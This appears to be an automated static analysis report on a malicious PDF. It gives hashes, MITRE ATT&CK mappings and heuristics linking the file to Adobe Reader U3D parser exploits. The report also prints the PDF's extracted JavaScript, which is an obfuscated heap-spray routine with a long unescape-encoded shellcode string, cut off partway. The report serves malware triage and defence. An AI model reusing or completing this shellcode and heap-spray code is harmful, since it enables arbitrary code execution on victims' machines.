Malicious PDF — malware analysis report

Static analysis result for SHA-256 81ca434cab270376…

MALICIOUS

PDF

320.0 KB Created: 2008-01-05 16:25:50 +01:00 Authoring application: LaTeX with hyperref package (via pdfeTeX-1.21a) First seen: 2026-05-08
MD5: 2ed62eefc1fc5041c6d4f09a86db4e85 SHA-1: b236e0012114e0dd2ca0358265a634025d397dd4 SHA-256: 81ca434cab2703769e7a5e04f75701db9e00f2c6ec23aaa96ae3060d8008435b
212 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains embedded JavaScript and U3D content, triggering critical heuristics related to Adobe Reader U3D parser exploits (CVE-2011-2462 and CVE-2009-3459). The JavaScript appears to be a heap spray designed to facilitate the exploitation of these vulnerabilities. The primary goal is likely to achieve arbitrary code execution for downloading and running a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9868

Heuristics 8

  • Adobe Reader U3D parser exploit with JavaScript heap spray critical CVE likely CVE_2011_2462_U3D_HEAPSPRAY
    PDF combines U3D/3D annotation content with JavaScript heap-spray shellcode. Public CVE-2011-2462 exploit chains use a crafted U3D stream and JavaScript heap spray to control memory during Adobe Reader's U3D parser corruption.
  • Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 critical CVE likely CVE_2009_2990_U3D_AUTOACTIVATE
    PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
  • U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator high CVE related PDF_U3D_CVE_RELATED
    PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • External URI info PDF_URI
    PDF contains an external URL action
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://vcg.isti.cnr.it)/S/URI/Type/Action In PDF document text
    • http://meshlab.sourceforge.net)/S/URI/Type/ActionIn PDF document text
    • http://vcg.isti.cnr.itPDF link annotation
    • http://meshlab.sourceforge.netIn PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0015_000.js pdf-javascript-stream PDF /JS object 15 at offset 0x665 5452 bytes
SHA-256: 1f14163b18a0dd9c1620895d8541a53dd197273f7999faee5066fadc473eb3bd
Preview script
First 1,000 lines of the extracted script
var unes=unescape;
function StringBuffer()   
{   
    this._strings = [];   
    if(arguments.length==1)   
    {   
        this._strings.push(arguments[0]);   
    }   
}   
  
StringBuffer.prototype.append = function(str)   
{   
    this._strings.push(str);   
    return this;   
}   
  
StringBuffer.prototype.toString = function()   
{   
    return this._strings.join("");   
}   
  

StringBuffer.prototype.length = function()   
{   
    var str = this._strings.join("");   
    return str.length;   
}   
function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret='';
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret += util["\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf.substr(x,2)));//
          }
          return ret;
}
var sc=unes("%u24EB%u335B%u66C9%uC181%u0273%uF38B%uC033%u238A%uEC80%uC041%u04E4%u438A%u2C01%u0241%u88E0%u4326%u4643%uE8E2%u05EB%uD7E8%uFFFF%u49FF%u4F4C%u494D%u4F42%u414D%u4141%u4144%u4141%u4F41%u4549%u4145%u4143%u4141%u4941%u454A%u5046%u5045%u4850%u5046%u4745%u4449%u4D44%u494B%u464B%u4F4C%u4E49%u414D%u4142%u4141%u4941%u454A%u4F46%u504D%u4850%u5046%u4745%u4549%u4150%u4D44%u4C48%u4F50%u4D49%u414D%u4142%u4141%u4941%u454A%u4F46%u5049%u4850%u5046%u4745%u4B49%u4246%u4148%u4841%u4F4D%u4C49%u414D%u4142%u4141%u4941%u454A%u4F46%u5045%u4850%u5046%u4745%u4B49%u4A4E%u484C%u4E4E%u4F50%u4B49%u414D%u4142%u4141%u4941%u454A%u4F46%u5041%u4850%u5046%u4745%u4B49%u414D%u4E49%u484B%u4F47%u4A49%u414D%u4142%u4141%u4941%u454A%u4E46%u504D%u4850%u5046%u4745%u4249%u4747%u5046%u424B%u4F41%u4949%u414D%u4142%u4141%u4941%u454A%u4E46%u5049%u4850%u5046%u4745%u4249%u4850%u414A%u4F4B%u4F49%u4849%u414D%u4142%u4141%u4941%u454A%u4E46%u5045%u4850%u5046%u4745%u5049%u4A4C%u5048%u414E%u4F50%u4749%u414D%u4142%u4141%u4941%u454A%u4D46%u504D%u4850%u5046%u4745%u4F49%u4A4D%u4148%u4144%u4F4D%u4649%u414D%u4142%u4141%u4941%u454A%u4C46%u5049%u4850%u5046%u4745%u5049%u4347%u4C43%u484A%u4F4D%u4549%u414D%u4142%u4141%u4941%u454A%u4C46%u5045%u4850%u5046%u4745%u4849%u4E4F%u4F49%u4843%u4F44%u4449%u414D%u4142%u4141%u4941%u454A%u4B46%u504D%u4850%u5046%u4745%u4949%u454F%u414F%u4F4F%u4F4D%u4349%u414D%u4142%u4141%u4941%u454A%u4D46%u5045%u4850%u5046%u4745%u4A49%u5049%u494F%u414B%u4F4F%u4249%u414D%u4142%u4141%u4941%u454A%u4D46%u4441%u5044%u4947%u4D44%u4147%u4945%u454E%u4B46%u4641%u4641%u5047%u4650%u4F46%u4441%u444E%u4141%u4141%u4146%u4841%u4F46%u494F%u484A%u4B46%u4941%u454A%u5046%u4A4D%u494A%u454C%u504E%u464D%u4642%u5043%u4650%u4C46%u4949%u454A%u4B46%u4A49%u464A%u4643%u4643%u5043%u4850%u4B46%u5041%u4650%u4E46%u494D%u464E%u4A4E%u4A41%u464A%u4643%u5044%u4850%u5046%u504D%u4850%u4B46%u5049%u4850%u4B46%u5041%u4650%u4E46%u4949%u454C%u4B46%u4549%u4941%u4442%u4549%u4347%u464F%u474B%u4849%u5046%u4948%u4842%u4149%u4345%u4144%u4947%u4242%u484A%u4F46%u494F%u484E%u4141%u494D%u454C%u4141%u4949%u454A%u5046%u4949%u484A%u4B46%u4945%u494E%u4146%u5041%u504F%u5050%u4650%u4741%u4A49%u4141%u4142%u4141%u5041%u4650%u4F46%u494D%u494E%u4146%u5041%u504F%u5050%u4650%u5041%u4650%u4F46%u4D49%u4948%u4146%u5041%u504F%u5050%u4550%u4742%u4844%u4643%u4D43%u4948%u4146%u5045%u504F%u5050%u4750%u4445%u4444%u4343%u4D4F%u4948%u4146%u5049%u504F%u5050%u4550%u4646%u4549%u4146%u4741%u414B%u4741%u414B%u4743%u414B%u4745%u414B%u4741%u414B%u4744%u4149%u4141%u4141%u4541%u4941%u494E%u4146%u5041%u504F%u5050%u4650%u5041%u4650%u4F46%u4945%u454A%u4A46%u494D%u484C%u4B46%u4945%u504C%u494F%u454C%u504E%u4749%u4B41%u494E%u5044%u4149%u4841%u4145%u4446%u4E46%u4E4D%u4E4B%u4E4D%u4B4B%u454C%u454A%u454A%u4F4A%u4F43%u4750%u4A42%u464A%u4643%u5044%u4850%u5046%u4649%u5047%u4850%u4A46%u504D%u4650%u4E46%u4645%u5047%u4650%u4C46%u5045%u4850%u4A46%u504D%u4650%u4D46%u4D4D%u4948%u4146%u5041%u504F%u5050%u4550%u4742%u4844%u4643%u4D43%u4948%u4146%u5045%u504F%u5050%u4750%u4445%u4444%u4343%u4D4F%u4948%u4146%u5049%u504F%u5050%u4550%u4646%u4549%u4146%u4741%u414B%u4941%u494E%u4146%u5041%u504F%u5050%u4650%u4A41%u4A41%u5041%u4650%u4D46%u4741%u414B%u5041%u4650%u4B46%u4
... (truncated)
stream_009_off00024ab2.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x24AB2 177792 bytes
SHA-256: b1f937b9541d599e1c6000c4c47f7f3f21a4d9b0e1051c8a5580e07bc6106afd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.72, consistent with packed or encrypted content.
font_00_type1_off0001deff.bin pdf-font-stream PDF embedded font (type1) at offset 0x1DEFF 6428 bytes
SHA-256: d129a586d7449f3004ab2629e1b01753002037f8ca955d68339aba6fea13d9dd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
font_01_type1_off0001f79a.bin pdf-font-stream PDF embedded font (type1) at offset 0x1F79A 7849 bytes
SHA-256: 6d68a200ddadd677e7031f9795a017ce42b4d7f02b68d39a072ecbc1e20fb5d6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.64, consistent with packed or encrypted content.
font_02_type1_off00021666.bin pdf-font-stream PDF embedded font (type1) at offset 0x21666 2374 bytes
SHA-256: cab7a46a0f2b73639fc37aa221b515da6888b096748ee89dec2f4876e25f7f1f
font_03_type1_off00021e57.bin pdf-font-stream PDF embedded font (type1) at offset 0x21E57 11287 bytes
SHA-256: f1d06dc0327817e03d778a88f65436557134c269106fbc5438dd4ef0c897a441
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.76, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.